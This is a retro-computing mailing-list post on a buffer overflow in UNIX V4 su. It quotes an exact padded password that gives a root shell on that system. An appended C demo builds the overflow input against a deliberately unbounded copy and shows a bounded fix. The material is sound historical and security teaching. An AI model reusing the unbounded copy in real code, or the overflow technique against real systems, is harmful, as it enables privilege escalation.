[TUHS] Buffer overflow found/fixed in v4 tape ;)

Dan Cross via TUHS tuhs at tuhs.org
Wed Jan 14 00:35:13 AEST 2026


On Mon, Jan 12, 2026 at 11:49 PM Craig B Agricola via TUHS
<tuhs at tuhs.org> wrote:
> On Mon, Jan 05, 2026 at 12:08:14PM -0500, Paul Winalski via TUHS wrote:
> > The problem with that philosophy is that a buffer overflow doesn't
> > necessarily lead to a program crash.  A program crash is the lucky
> > outcome.  If you're unlucky you will silently get the wrong answer, or
> > other misbehavior.
>
> In fact, in this case, far from just a program crash, you have a trivial
> privilege escalation.  I'll repeat what I posted on the Metzdowd
> Cryptography list[1].
>
> Since the buffer that you're comparing the crypt() of the input against
> is immediately after the buffer for the input, all you have to do is pad
> out the input to overwrite the hash that was read from /etc/passwd to
> the known hash of the beginning of your password input.  crypt() of that
> era only takes into account the first 8 characters of the password.  So,
> for instance, from an unprivileged user account, providing the following
> password to su gives you a root shell.
>
> abcdefghxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx5WWWWWWW:
>
> It's pretty quick to spin up a fresh simulator with the UNIX v4 tape
> install, create a user account, and then try to su with that password.

I have a (very) vague memory that this was a known attack at some
point in the past, but I no longer remember where I picked that up.
Probably from discussions with the local sysadmins when I was in high
school.

        - Dan C.
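Added illustration, not code from the V4 tape, from the post, or from its author: a small C reproduction of the layout Craig describes, with the stored hash sitting directly after the password input buffer and the input copied with no bound, beside a bounded version of the same check. Everything in it is assumed for the demo: a 100-byte input buffer, an 8-character hash, a stand-in toy_crypt() that is not the V4 crypt() (it only keeps the two properties the attack needs, namely that just the first 8 characters of the password count and that the result is 8 printable characters), and the constructed account password "realpass", which the attack never uses.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Hypothetical sizes for the demo; the V4 code is not reproduced here. */
#define PW_LEN   100   /* password input buffer */
#define HASH_LEN 8     /* stored hash, as many chars as the toy crypt emits */

/* Toy stand-in for the V4-era crypt(): NOT the real algorithm.  Only the
 * first 8 characters of pw influence the result, and chars 0..5 encode all
 * 32 bits of the state, so distinct states give distinct hashes. */
static void toy_crypt(const char *pw, char out[HASH_LEN + 1])
{
    static const char alphabet[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789./";
    uint32_t h = 2166136261u;                 /* FNV-1a style mixing, illustration only */
    for (int i = 0; i < 8 && pw[i] != '\0'; i++) {
        h ^= (unsigned char)pw[i];
        h *= 16777619u;
    }
    uint32_t g = h * 2654435761u;             /* second word for the last two chars */
    for (int i = 0; i < 6; i++)
        out[i] = alphabet[(h >> (6 * i)) & 63];
    out[6] = alphabet[g & 63];
    out[7] = alphabet[(g >> 6) & 63];
    out[HASH_LEN] = '\0';
}

/* Vulnerable check.  Both buffers are slices of one array so the adjacency
 * the post describes (hash right after the input) is guaranteed here instead
 * of being left to the compiler.  The copy loop has no bound. */
static int su_check_vulnerable(const char *passwd_hash, const char *typed)
{
    char region[PW_LEN + HASH_LEN + 1];
    char *pwbuf  = region;                    /* typed password lands here */
    char *stored = region + PW_LEN;           /* hash from /etc/passwd, right after */
    char h[HASH_LEN + 1];
    size_t i;

    strcpy(stored, passwd_hash);              /* the account's hash is read first... */
    for (i = 0; typed[i] != '\0'; i++)        /* ...then the password, unbounded: */
        pwbuf[i] = typed[i];                  /* from index PW_LEN on this clobbers stored */
    pwbuf[i] = '\0';

    toy_crypt(pwbuf, h);
    return strcmp(h, stored) == 0;
}

/* Fixed check: reject input that does not fit, and keep the hash in its own buffer. */
static int su_check_fixed(const char *passwd_hash, const char *typed)
{
    char pwbuf[PW_LEN], stored[HASH_LEN + 1], h[HASH_LEN + 1];

    if (strlen(typed) >= sizeof pwbuf)        /* no room for the terminator: refuse */
        return 0;
    strcpy(pwbuf, typed);
    strcpy(stored, passwd_hash);
    toy_crypt(pwbuf, h);
    return strcmp(h, stored) == 0;
}

/* Build the input the post describes: 8 chosen characters, padding up to the
 * end of the input buffer, then the hash of those 8 characters exactly where
 * the stored hash sits.  Returns the length written, or 0 if out is too small. */
static size_t craft_overflow(char *out, size_t cap, const char *prefix8)
{
    char h[HASH_LEN + 1];

    if (cap < PW_LEN + HASH_LEN + 1 || strlen(prefix8) != 8)
        return 0;
    toy_crypt(prefix8, h);
    memcpy(out, prefix8, 8);
    memset(out + 8, 'x', PW_LEN - 8);
    memcpy(out + PW_LEN, h, HASH_LEN);
    out[PW_LEN + HASH_LEN] = '\0';
    return PW_LEN + HASH_LEN;
}

/* Normal login attempt against an account whose password is real_password. */
static int login(const char *real_password, const char *typed,
                 int (*check)(const char *, const char *))
{
    char real_hash[HASH_LEN + 1];
    toy_crypt(real_password, real_hash);
    return check(real_hash, typed);
}

/* The padded input against the same account; real_password is never typed. */
static int attack(const char *real_password, int (*check)(const char *, const char *))
{
    char evil[PW_LEN + HASH_LEN + 1];
    if (craft_overflow(evil, sizeof evil, "abcdefgh") == 0)
        return -1;
    return login(real_password, evil, check);
}

int main(void)
{
    printf("vulnerable su, real password: %d\n", login("realpass", "realpass", su_check_vulnerable));
    printf("vulnerable su, padded input : %d\n", attack("realpass", su_check_vulnerable));
    printf("fixed su, padded input      : %d\n", attack("realpass", su_check_fixed));
    return 0;
}
```

The padded input accepted by su_check_vulnerable has the same shape as the one in the post: the 8 characters that get hashed, filler to the end of the buffer, then the attacker's own hash where the account's hash used to be. The bounded version refuses it on length alone, before any comparison; the separate fix of not letting the two buffers touch only matters if some other unbounded write remains.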

